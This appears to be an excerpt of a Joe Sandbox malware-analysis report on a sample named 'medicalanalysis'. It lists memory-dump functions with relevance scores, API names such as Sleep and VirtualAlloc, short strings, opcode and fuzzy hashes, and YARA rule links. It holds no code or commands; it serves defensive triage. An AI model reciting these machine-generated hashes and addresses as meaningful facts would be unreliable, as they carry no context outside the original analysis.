                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 3f079720185b1a2ce181e6ebbf6644144d38aaa705a7cc09beac8f80dd33a5a7
                                                                                                                                                                                                                                                                                                                • Instruction ID: 0d0447ecfebaf5aa79940f789c05ccfdf515188b0bb1885196d7d1b3a24f2183
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f079720185b1a2ce181e6ebbf6644144d38aaa705a7cc09beac8f80dd33a5a7
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5031D9B5D012189FCB10CFA9D981ADEFBF5AB49320F14842AE804B7210C735A946CFA4
                                                                                                                                                                                                                                                                                                                Function 05A3CC18 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2859495393.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5a30000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 3a638ea46e1cec155bbd1c6a62c1ac5527311e30d0b146127b8b30554b490e0c
                                                                                                                                                                                                                                                                                                                • Instruction ID: 3b4929b9adb00f9194140dbebfab2923dd582a085c465dc18c189d4e9b619ef8
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a638ea46e1cec155bbd1c6a62c1ac5527311e30d0b146127b8b30554b490e0c
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F31DBB5D012589FCB10CFA9D984ADEFBF5BF49320F14842AE814B7210C735A946CFA4
                                                                                                                                                                                                                                                                                                                Function 0589D7F0 Relevance: 1.5, Strings: 1, Instructions: 285COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: ,aq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3092978723
                                                                                                                                                                                                                                                                                                                • Opcode ID: 51825e90c648fcb5b2f289d75f467b5fef96ba433b34795aacdf3003667dea09
                                                                                                                                                                                                                                                                                                                • Instruction ID: 47f7f6a91cc4aaee1fba9a50dd2bf8fd89883d2cc945da4b9959ba86e558216e
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51825e90c648fcb5b2f289d75f467b5fef96ba433b34795aacdf3003667dea09
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9C14C75A002188FDB18DF68C945BEDBBF6AF88700F158099E909E7365CA31DD858F61
                                                                                                                                                                                                                                                                                                                Function 0589C918 Relevance: 1.5, Strings: 1, Instructions: 270COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: 4']q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-1259897404
                                                                                                                                                                                                                                                                                                                • Opcode ID: 490dd0cb4ffe2b6a132c80bdf64d078dcc64559ccfa2c2446a5173de0b2fc559
                                                                                                                                                                                                                                                                                                                • Instruction ID: b7644bf48763af84e4b98844dcb3009beb239afd290ebed8e381229d3c8daa9a
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 490dd0cb4ffe2b6a132c80bdf64d078dcc64559ccfa2c2446a5173de0b2fc559
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2B1EA35A10218DFCB08DFA8D899D9DBBB2FF89300F558155E906AB365DB31EC42CB81
                                                                                                                                                                                                                                                                                                                Function 00A75DA1 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2830355235.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_a70000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: PH]q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3168235125
                                                                                                                                                                                                                                                                                                                • Opcode ID: 0f16c39cd13cc8276ae6d7809734a86069ae228bbedd2d5df71b97364bd28c64
                                                                                                                                                                                                                                                                                                                • Instruction ID: a218f4bcb17701a09bbb6265c0c246e28f51ff750579ba300b95c954d14e5c63
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f16c39cd13cc8276ae6d7809734a86069ae228bbedd2d5df71b97364bd28c64
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5D19B74D04668CFDB64DF69CC98BA9BBB1BB48309F1081EAD40DA3251DBB45AC6CF01
                                                                                                                                                                                                                                                                                                                Function 058984D0 Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: Pl]q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-2207481929
                                                                                                                                                                                                                                                                                                                • Opcode ID: 64bc19c93fce4c670e9f1de07b9ef549db854c2431abe64715f71d88e32966de
                                                                                                                                                                                                                                                                                                                • Instruction ID: 2893755548fef1ea88515c16c8e9cf0d97f939628770de094fbec4879fbbb838
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 64bc19c93fce4c670e9f1de07b9ef549db854c2431abe64715f71d88e32966de
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19911434B001098FDB08DF28C594AAA7BF6BF8A714F1440A9E906DB3B5DB71ED41CB91
                                                                                                                                                                                                                                                                                                                Function 05893570 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: (aq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-600464949
                                                                                                                                                                                                                                                                                                                • Opcode ID: df839e991062df1093fe9477215dc0ec781db6287151a9fd50b03d253f006453
                                                                                                                                                                                                                                                                                                                • Instruction ID: c4bb63fd558f69241dae234b4f8c7e538718ff802a00f68c3b496d324eea29f3
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df839e991062df1093fe9477215dc0ec781db6287151a9fd50b03d253f006453
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E51AE31B006168FCB05DF58C484A6ABBB1FF85320F198A59E925DB341DB30FC52CB95
                                                                                                                                                                                                                                                                                                                Function 058925B0 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: paq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3273118895
                                                                                                                                                                                                                                                                                                                • Opcode ID: bb9cc006e46ad9aaabb6d021cceef86a06c24e03a31fb3318782f3b06d328edb
                                                                                                                                                                                                                                                                                                                • Instruction ID: f3723c3140d0d0c6cdf71c7f8e42e38a7b4851c20c56a2248a6fc6c5f0c779a2
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb9cc006e46ad9aaabb6d021cceef86a06c24e03a31fb3318782f3b06d328edb
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7514A76640104AFCB499FA8C944D29BFF7FF8D31071980D8E6098B276DA32DC22EB50
                                                                                                                                                                                                                                                                                                                Function 05894450 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: ,aq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3092978723
                                                                                                                                                                                                                                                                                                                • Opcode ID: 1b5b5af7d86f9f6ea467e974dfb7f8b826a8857cde01aa1b25384be3d6069dc1
                                                                                                                                                                                                                                                                                                                • Instruction ID: 79138bc62f15fd5f4c344862a999fdecca70ee72e998365d3f3b4d196307622a
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b5b5af7d86f9f6ea467e974dfb7f8b826a8857cde01aa1b25384be3d6069dc1
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2351AD357001118FCF14DF69D994AAEBBE6FF89311B258069E906DB361DB71EC02CB91
                                                                                                                                                                                                                                                                                                                Function 0589ECF0 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: (aq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-600464949
                                                                                                                                                                                                                                                                                                                • Opcode ID: b942c426bdc027b5716cf8b7e1cce74679502891483c2ffdda84dae41d821435
                                                                                                                                                                                                                                                                                                                • Instruction ID: 1599b2b7ed283d8180fabc6f63647497c2f17668f033d31aa81ee719ef121a96
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b942c426bdc027b5716cf8b7e1cce74679502891483c2ffdda84dae41d821435
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01414E313041558FCB58DF398854A7E7BEABFC9610B1940A9F946CB3A2DE34DD02CBA5
                                                                                                                                                                                                                                                                                                                Function 04AA20C8 Relevance: 1.3, APIs: 1, Instructions: 95memoryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(?,?,?,?), ref: 04AA216F
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2853288774.0000000004AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_4aa0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: b9f773422068cc07b3f3881d2fc56148b206e766737274089f0b6ab5dd8fa962
                                                                                                                                                                                                                                                                                                                • Instruction ID: 0ca190fd2c54b13376ed30d8765ef1b5a345a267197bdd978c62564d72497850
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9f773422068cc07b3f3881d2fc56148b206e766737274089f0b6ab5dd8fa962
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C831A9B9D012589FCB10CFA9D884AEEFBB1AB49310F20942AE814BB310D735A945CF94
                                                                                                                                                                                                                                                                                                                Function 05892A58 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: (aq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-600464949
                                                                                                                                                                                                                                                                                                                • Opcode ID: 1227917f8c5c07fc712c1ad44408e1ae7111dc809a7dcf6748344644157b5bf8
                                                                                                                                                                                                                                                                                                                • Instruction ID: 20fe378b7882e4a1acb0dcd735104f6733671121728d347c818c6c2f67d540a4
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1227917f8c5c07fc712c1ad44408e1ae7111dc809a7dcf6748344644157b5bf8
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6621DF3A304245AFDB199F69D840AAEBFA7EFC9360B548079FA09CB251CE719C05C791
                                                                                                                                                                                                                                                                                                                Function 04AA20D0 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(?,?,?,?), ref: 04AA216F
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2853288774.0000000004AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_4aa0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 17d4ca0db747dd53f7a14a66529db32f3a2cac179a36019f4f9bac8e375783f7
                                                                                                                                                                                                                                                                                                                • Instruction ID: e1fba106bfdb451db78e48219de81c9a31d988cd1b2c35112bf92fd3a99a3c94
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17d4ca0db747dd53f7a14a66529db32f3a2cac179a36019f4f9bac8e375783f7
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C3198B9D012589FCF14CFA9D884AEEFBB1BB49310F20942AE814BB310D735A945CF94
                                                                                                                                                                                                                                                                                                                Function 0589B998 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: 4']q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-1259897404
                                                                                                                                                                                                                                                                                                                • Opcode ID: d18d0911163c0771f1d0aee040b0af401dec78b389fefa4e1c43bac6206ee492
                                                                                                                                                                                                                                                                                                                • Instruction ID: ed28d262033ab8d8a5e17139acfcce03883a936d1b38e89a9551426d065f72b6
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d18d0911163c0771f1d0aee040b0af401dec78b389fefa4e1c43bac6206ee492
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E319131700104DFCF089F94E994959BBB6FF8C310B0540A9EA06DB379DA31EC16CB91
                                                                                                                                                                                                                                                                                                                Function 058970B0 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: p<]q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-1327301063
                                                                                                                                                                                                                                                                                                                • Opcode ID: 156cca0bb9b4d00100aac1c4fd2138fc9444c39f894426e406bd56159e1a89d3
                                                                                                                                                                                                                                                                                                                • Instruction ID: a7d8988a63bbb1b7013f7b1ab545d1b75029a1c4f0f1ffaa6ec2f63231d3a602
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 156cca0bb9b4d00100aac1c4fd2138fc9444c39f894426e406bd56159e1a89d3
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 282127712042859FCF058F2AC880AAA7BE6FF8A315F0840A5FC55CB360DA35DC51CB20
                                                                                                                                                                                                                                                                                                                Function 05851E8E Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2857624604.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5850000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: 4']q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-1259897404
                                                                                                                                                                                                                                                                                                                • Opcode ID: 7f90b9f72e70ca5f7af0dd9026404928317c1a01455d14c1b295a6205716116a
                                                                                                                                                                                                                                                                                                                • Instruction ID: 33b4ac714767ca85fbc246b2c10ec9315a122030b85bf894e752b18ae68cf5eb
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f90b9f72e70ca5f7af0dd9026404928317c1a01455d14c1b295a6205716116a
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8312974D04209DFDB18CFA9D5097AEBBB2FB45325F00806AEC52A7250DB345E85CF51
                                                                                                                                                                                                                                                                                                                Function 05894440 Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: ,aq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3092978723
                                                                                                                                                                                                                                                                                                                • Opcode ID: 4597a6f59d7e75b3bf85faddd2ff362debc8a9ef158b0d8a105faba3296037ca
                                                                                                                                                                                                                                                                                                                • Instruction ID: e2650d0b0e0faf2d1dd67029bf1af67b372a59cb3f886a5f0b0e1e39d1d49c50
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4597a6f59d7e75b3bf85faddd2ff362debc8a9ef158b0d8a105faba3296037ca
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25116A35601116CFCF14DFA9D9949AABBB5BF88301F258069E905DB361DB70EC06CB90
                                                                                                                                                                                                                                                                                                                Function 00A71730 Relevance: 1.3, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2830355235.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_a70000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: <dtq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3090548385
                                                                                                                                                                                                                                                                                                                • Opcode ID: bbfc60f6037b42af68a7c0dabd5c48c148fc2251e8e1a260d3a53e05cf8acbb5
                                                                                                                                                                                                                                                                                                                • Instruction ID: 7b417c1136664d20cd6dc93e1097ea3d94a6ba8b141a037a82137affb7a8bf72
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bbfc60f6037b42af68a7c0dabd5c48c148fc2251e8e1a260d3a53e05cf8acbb5
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DF0C2767442504FC704DB38D818A6A3FE2ABCA315B2501E9E405CB3B6DA618C02CB61
                                                                                                                                                                                                                                                                                                                Function 05D2291B Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2860068737.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5d20000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: j
                                                                                                                                                                                                                                                                                                                • API String ID: 0-2137352139
                                                                                                                                                                                                                                                                                                                • Opcode ID: c87b53ebd11c885a7f4190f95647a2d9803f48cd16fa9984e42db16451ae2e78
                                                                                                                                                                                                                                                                                                                • Instruction ID: 755fd907cb1fb00d5583fbecbfffd096875648227195d988a716381c55b201c1
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c87b53ebd11c885a7f4190f95647a2d9803f48cd16fa9984e42db16451ae2e78
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2611E178A042688FCF54DF18D8996DAB7B1FB49304F1051EAE849A7784DB70AE80CF51
                                                                                                                                                                                                                                                                                                                Function 058CC8B2 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858353541.00000000058C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_58c0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: <
                                                                                                                                                                                                                                                                                                                • API String ID: 0-4251816714
                                                                                                                                                                                                                                                                                                                • Opcode ID: fc6a795e21a77882762044b8aad1573cbe28dba2ac1c065a0535d47342fcb9c3
                                                                                                                                                                                                                                                                                                                • Instruction ID: 43f720bf50990a47018de62dd2007a58db0828ccfaf9bab87f2588708ccb34a5
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc6a795e21a77882762044b8aad1573cbe28dba2ac1c065a0535d47342fcb9c3
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3CF014B09007A8CFDB20EF28DC44B9D7BB1AF01306F1044E9D549A7252CB34AA868F15
                                                                                                                                                                                                                                                                                                                Function 058CC834 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858353541.00000000058C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_58c0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: <
                                                                                                                                                                                                                                                                                                                • API String ID: 0-4251816714
                                                                                                                                                                                                                                                                                                                • Opcode ID: 3cae44c8f4b1c4691dea43cfeac8c4bebc4f6f9e1bd95a970404d0855a30ca82
                                                                                                                                                                                                                                                                                                                • Instruction ID: 470798566289c48017c472250f5af2bbbc95fa0496910af54f6fb893e4f9337e
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3cae44c8f4b1c4691dea43cfeac8c4bebc4f6f9e1bd95a970404d0855a30ca82
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D20119B0904798CFDB20EF24DC4479D7BB1AF41316F1045EAD549A7292CB346E85CF15
                                                                                                                                                                                                                                                                                                                Function 00A73E6C Relevance: 1.3, Strings: 1, Instructions: 25COMMON
